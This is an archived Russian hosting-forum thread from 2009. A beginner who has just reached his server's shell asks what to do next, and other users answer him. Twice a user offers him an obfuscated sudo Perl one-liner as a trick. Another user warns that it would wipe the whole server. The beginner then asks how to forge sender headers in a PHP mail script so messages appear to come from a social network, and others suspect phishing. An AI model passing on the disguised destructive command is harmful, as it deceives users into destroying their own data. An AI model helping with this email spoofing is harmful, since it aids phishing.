Помощь - Поиск - Пользователи - Календарь
Полная версия: по заходу в root
Онлайн-форум hostobzor.ru > Архив (темы до 1.06.2015). Только для чтения. > Коммерческий хостинг. Общие форумы > Виртуальный сервер и Виртуальный Выделенный Сервер
batrakk
Всем добрый вечер,скачал программу Private Shell , подконнектился к своему серверу,выдал такую запись; Last login: Sun Sep 13 22:33:43 2009 from 91.77.128.41
[admin@serv ~]$

Скажите что надо делать дальше?И еще,нужен человек который даст платную консультацию по одному вопроcу,тоже связанному с root.Оставляйте контакты здесь smile.gif .Спасибо.
different
Цитата(batrakk @ 14.09.2009, 02:25) *

Всем добрый вечер,скачал программу Private Shell , подконнектился к своему серверу,выдал такую запись; Last login: Sun Sep 13 22:33:43 2009 from 91.77.128.41
[admin@serv ~]$

Скажите что надо делать дальше?И еще,нужен человек который даст платную консультацию по одному вопроcу,тоже связанному с root.Оставляйте контакты здесь smile.gif .Спасибо.


Почитать о том, что такое shell и как в нем работать. На форуме такое не расписать.
lazutov
Первый раз о такой программке слышу(использую putty), скачал, нод орет на троян-кейлогер.
Данные от вашего сервера чисто теоретически могут быть уже у злоумышленников.

в shell нужно вводить команды, как в коммандную строку windows smile.gif
Вам поможет или сторонний знающий человек(за деньги, причем стоить будет намного дороже обычного администрирования ) или огромное желание самообучаться, хлещущее через край. Бесплатно вас будут обучать только в 0.01% случаев, и то, для этого нужны причины.
Ivan
В root?
Поди linux. Ну, интересный эффект дает эта команда

sudo perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'
Денис
Цитата(batrakk @ 13.09.2009, 23:25) *

И еще,нужен человек который даст платную консультацию по одному вопроcу,тоже связанному с root.

Я могу дать бесплатную консультацию
Цитата(batrakk @ 13.09.2009, 23:25) *

Скажите что надо делать дальше?

Нажать на букву "Х" в правом верхнем углу окна. Далее на компе нажать кнопку в виде буквы "О" с палочкой вверху. Купить книжку "Unix для начинающих" и прочитать ее...

Извините, не удержался... Ну серьезно, ну что вам под рутом делать с такими познаниями? Ну хотя бы минимальные базовые теоретические знания получите сперва. На вождение учатся сперва читая теорию/правила. Здесь нужно так же.
batrakk
Я же просто спросил как входить?Для изучения.Я же не говорил что буду что то там делать.Все дело еще в том,что мне необходимо научится выполнять одну операцию,она скорее всего связана с root,человек который мне делал проводил ее за несколько секунд,а я заплатил 10 баксов.Подобную процедуру мне необходимо проделывать несколько раз в день ,я же не буду по 40-50 баксов ежедневно отваливать.Господа не смейтесь,мне советовали обратится к специалисту и самому не соваться когда я спрашивал инструкцию по переустановке винды,но когда с меня содрали 15 т.р. уже через месяц я научился ее переустанавливать на раз два три.
Dmitry Gushin
Так что за операция то?
Вы расскажите, что надо, а то у меня буквально с сегодняшнего дня штатный телепат в декрет ушла, это на долго.
lazutov
Цитата(Ivan @ 14.09.2009, 09:50) *
В root?
Поди linux. Ну, интересный эффект дает эта команда

sudo perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

Доброта через край хлещет прямо.
Нехорошо оно так.

Расскажите, что вам надо сделать, и не в коем случае не запускаете команды, которые кажутся вам заклинаниями.

PS я думаю, что в этой системе нет судо, поэтому обозначенная команда не удалит весь сервер, к сожалению счастью.
xaker1
Цитата(batrakk @ 14.09.2009, 00:25) *

Всем добрый вечер,скачал программу Private Shell , подконнектился к своему серверу,выдал такую запись; Last login: Sun Sep 13 22:33:43 2009 from 91.77.128.41
[admin@serv ~]$

Скажите что надо делать дальше?И еще,нужен человек который даст платную консультацию по одному вопроcу,тоже связанному с root.Оставляйте контакты здесь smile.gif .Спасибо.

Ушло на баш, там топику самое место.
Вижу вам администрируют сервер, пусть дальше администрируют, пока вы в shell`e не научитесь работать.
ComfoPlace.com
batrakk
Хм... Ну не вопрос подсказать.
Пиши на pav@логин_на_этом_форуме
batrakk
Хорошо объясняю,вот скриншот как видите в двух верхних полях стоит адрес "однокласников" ,мне нужно научится подставлять в те поля другие адреса,сразу говорю что php скрипт сам ничего не прописывает,если я ставлю в поле "от кого" другой адрес,то в заголовках он отображается только в нижнем поле from ,верхние же поля осаются без изменений.Как я уже говорил ранее,у человека на это ушло меньше минуты.Если кто сможет помочь,без проблем заплачу.
ComfoPlace.com
batrakk
Как говорил Ivan, то вам нужно набрать в консоли:
Код
perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

P.S: Ну вот так всегда.
P.S.S: А с Башем-то что? Прошёл?
batrakk
Спасибо вопрос решен,c трудом нашел грамотного php программера который подделал скрипт как нужно и не понадобился root laugh.gif
different
Спамеры просят научить спамить? blink.gif
Урсу Юрий
Цитата(different @ 15.09.2009, 16:49) *

Спамеры просят научить спамить? blink.gif

Не. Типа "спрятаться" smile.gif
ex-SavaHost
Цитата(Урсу Юрий @ 15.09.2009, 13:51) *

Не. Типа "спрятаться" smile.gif

Это не "спрятался". Это похоже фишинг.
Малограмотный...
xaker1
Цитата(ComfoPlace.com @ 15.09.2009, 14:20) *

P.S.S: А с Башем-то что? Прошёл?

Ждемс. Пока только в бездне
batrakk
Можете тему закрывать,скриншот убрал.IP и заголовки менять научился,все что нужно в нашей работе.Спасибо за внимание.
Это текстовая версия — только основной контент. Для просмотра полной версии этой страницы, пожалуйста, нажмите сюда.
Русская версия Invision Power Board © 2001-2024 Invision Power Services, Inc.